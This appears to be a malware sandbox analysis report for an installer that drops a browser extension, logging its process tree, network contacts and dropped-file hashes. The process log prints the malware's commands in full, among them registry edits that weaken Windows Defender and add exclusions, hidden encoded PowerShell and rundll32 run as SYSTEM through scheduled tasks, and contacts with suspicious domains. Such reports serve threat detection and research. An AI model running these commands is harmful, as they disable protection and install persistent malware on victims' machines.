"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hkBthRLftwjEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hkBthRLftwjEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oGdIbQIKIHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oGdIbQIKIHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prAQyJMeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prAQyJMeU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zNBDoCPwUgCU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zNBDoCPwUgCU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wpmocubwzvTKZWVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wpmocubwzvTKZWVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HKomOEKiubDeyUja\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HKomOEKiubDeyUja\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wpmocubwzvTKZWVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wpmocubwzvTKZWVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HKomOEKiubDeyUja /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HKomOEKiubDeyUja /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gWafpvbAb" /SC once /ST 05:56:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gWafpvbAb"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gWafpvbAb"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "emrEEeoVdUigmulhl" /SC once /ST 03:23:02 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe\" 4u /VitAdidKb 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "emrEEeoVdUigmulhl"

C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe

C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe 4u /VitAdidKb 525403 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 692

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bcicWGWSPuqTxjDSpV"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prAQyJMeU\lCDWlq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rbzCIowvsKWRrhO" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rbzCIowvsKWRrhO2" /F /xml "C:\Program Files (x86)\prAQyJMeU\kFKuXmE.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "rbzCIowvsKWRrhO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "rbzCIowvsKWRrhO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yZMZGSbxnbvyuO" /F /xml "C:\Program Files (x86)\zNBDoCPwUgCU2\RTSVFYZ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IeZcDvoJstcUS2" /F /xml "C:\ProgramData\wpmocubwzvTKZWVB\dFstSeJ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "XgRdArvYBmOriRaMM2" /F /xml "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\SFcnKKv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "pKGBoMxbXyYHoUCPnwv2" /F /xml "C:\Program Files (x86)\hkBthRLftwjEC\acvJZfh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EXxaHtUqjXkXqVrbU" /SC once /ST 17:32:18 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HKomOEKiubDeyUja\reURFsNl\ExiCsum.dll\",#1 /GPdidNKwD 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "EXxaHtUqjXkXqVrbU"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\HKomOEKiubDeyUja\reURFsNl\ExiCsum.dll",#1 /GPdidNKwD 525403

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\HKomOEKiubDeyUja\reURFsNl\ExiCsum.dll",#1 /GPdidNKwD 525403

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "emrEEeoVdUigmulhl"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 2132

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "EXxaHtUqjXkXqVrbU"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 32.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.237.26.169:80 api5.check-data.xyz tcp
US 8.8.8.8:53 25.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe

MD5 4954abb31b477d6495481b1f64853c7d
SHA1 a2687a4e496f8550d9cbbd94aca9b50300dccc1c
SHA256 88ad0a455dd1361c35d39dc017fc716cbfc9fa14ed4b3f33ed1f23963ee81290
SHA512 e58ef708ca63ec3a9a3798935e3d5451f74bda1d47aa3960115a02616ab9904a03bad4d3ecde54b537963c328daaa09107a858f5ae50c71ffaedc6bd03be1529

C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe

MD5 f9a08c6959d27b9edcb157f1938ff8c9
SHA1 f57fc4c0780afc65f84b3f1fddd55bdd7519c3e2
SHA256 d052b74c87dd082fa1ccc32b8441e63e433a60c69b21174ccf43f7f134a725e0
SHA512 eabdfc83451aa2523b924f670a5026438dc69ae9c0687b8bf12c9e318e0bbab34862ebc7e39221f140af67cd9622e5e4f9c7881feb7376bb9c4fd31e3b62fe33

memory/1856-14-0x0000000004750000-0x0000000004786000-memory.dmp

memory/1856-15-0x0000000007250000-0x0000000007878000-memory.dmp

memory/1856-16-0x0000000007180000-0x00000000071A2000-memory.dmp

memory/1856-17-0x0000000007A60000-0x0000000007AC6000-memory.dmp

memory/1856-18-0x0000000007AD0000-0x0000000007B36000-memory.dmp

memory/1856-19-0x0000000007B40000-0x0000000007E90000-memory.dmp

memory/1856-20-0x0000000007F10000-0x0000000007F2C000-memory.dmp

memory/1856-21-0x0000000007F70000-0x0000000007FBB000-memory.dmp

memory/1856-22-0x0000000008270000-0x00000000082E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dvp3retq.enh.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1856-37-0x0000000009340000-0x00000000093D4000-memory.dmp

memory/1856-38-0x0000000009060000-0x000000000907A000-memory.dmp

memory/1856-39-0x0000000009080000-0x00000000090A2000-memory.dmp

memory/1856-40-0x00000000098E0000-0x0000000009DDE000-memory.dmp

memory/4416-48-0x0000000010000000-0x00000000105E8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1 eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256 dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

memory/3772-54-0x0000000007ED0000-0x0000000008220000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 922d8c1f82b3790fb4114e8011c5d229
SHA1 e9718c35ef2dbc8bff225c569e7cb14ca5a0f392
SHA256 d0a01618fbcbb139e2ecdb47618275833d3794a7662a58b46f8906a648b7e17c
SHA512 7e1655a4fcbbd48f8ce1c625c6cba41906f3a3453d7d5274e4b70b4a9cec01ea24ff702d0b0f09fffa08ed1722cdfca0d5e9b4865424d87ed37470c6ebf77656

memory/3772-56-0x0000000008500000-0x000000000854B000-memory.dmp

memory/660-71-0x00000000006B0000-0x000000000075E000-memory.dmp

memory/748-73-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3136-78-0x00000000067F0000-0x000000000683B000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5f3319e01844846a98153ce1088d5fae
SHA1 6404dd78b6712ab5b4c7ff0fcf5565d7d9391d53
SHA256 f142f59f1dca55a1cab2ea937e4933f47769f737b4b4c3b4b73c42c6657e9634
SHA512 c5c367acb76a0218d8615e942ad56e71f307266d8446a56776145346a59eaac85d77dc2fc56a833d446dbd059d98febcd45a8b9ced7110b0375449d96f27e2bb

memory/4204-117-0x0000000006510000-0x0000000006860000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 174b045dd98fac905fc0ecea7c926770
SHA1 f5127dee8cc02b60f4211f4cc8efe327a74cd8c2
SHA256 dfe140bda845be6914f257f0163c668f77499ea141d5321093b053ac4c0351f3
SHA512 18f8382998fae36378795e7899f67a080687b4a059be446589a8e6a61eeb1727e658d831e34bf203963cf89b5cfac92617f88257941d8fc9679e13e4755974a1

memory/4204-119-0x0000000006D20000-0x0000000006D6B000-memory.dmp

memory/4776-141-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/4776-153-0x0000000002F40000-0x0000000002FC5000-memory.dmp

memory/2004-159-0x0000000006EC0000-0x0000000007210000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e273a4ec50254db9c9cf2c74bd2747d9
SHA1 46e1f1d07ca8cfbb369847cfa07ce1dd773a3f34
SHA256 64ac84e011d0bc673809ee0323fba3a4a9778278c9c9705daefaa7f286089de3
SHA512 937f8a268fcd0d28d40efdcf6c2f98e7b68e4b94ef9bdd2f458a99e77661a3b63e78132e4dd6cb133b08548d4ad33d655d735c23e0b54ca7c9f5a6c12c7a2519

memory/2004-167-0x0000000007830000-0x000000000787B000-memory.dmp

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 62ff23714d8aaec538d6acdc59d423f3
SHA1 5d4e313ed4fbe55f64dec175abe2b768193522bd
SHA256 06778935558dd29826167d232ef004ee3f57da3e61496b33f1ed0f6dcfb9a0ab
SHA512 565bc8347947414b9054cb17f88cb134654ed9438c2857ac86886875e9ef547053921a679a2b332e9a65ac22819a39593629619955dc25d01d5247b863b56381

memory/4776-210-0x0000000003690000-0x00000000036F3000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
